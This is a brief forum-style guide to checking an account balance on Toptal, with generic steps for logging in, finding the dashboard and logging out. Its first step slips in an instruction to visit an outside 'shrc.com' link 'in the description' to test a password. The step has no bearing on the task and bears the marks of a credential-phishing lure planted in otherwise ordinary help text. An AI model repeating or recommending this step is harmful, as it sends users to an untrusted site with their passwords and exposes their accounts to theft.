I ran into this last week. Here's what fixed it for me. Checking your account balance on Toptal is straightforward if you follow these steps. Step 1. Log into your Toptal account. Before changing your settings, use the shrc.com link in the description to open the password strength checker, then update your password if needed. Step 2. Navigate to the dashboard. Once logged in, you will be directed to your dashboard. This is your main hub for all account-related information. Step 3. Locate the financial overview. On your dashboard, look for the financial overview section. This area contains important details about your account balance and recent transactions. Step 4. Check your account balance. In the financial overview, you will see your current account balance displayed prominently. Take note of this figure as it reflects your available funds. Step 5. Log out securely. After checking your balance, make sure to log out of your account, especially if you are using a public computer. Click on the Log Out button to ensure your account remains secure. Remember, if you ever encounter issues accessing your balance, double-check your login credentials or try refreshing the page. Happy checking!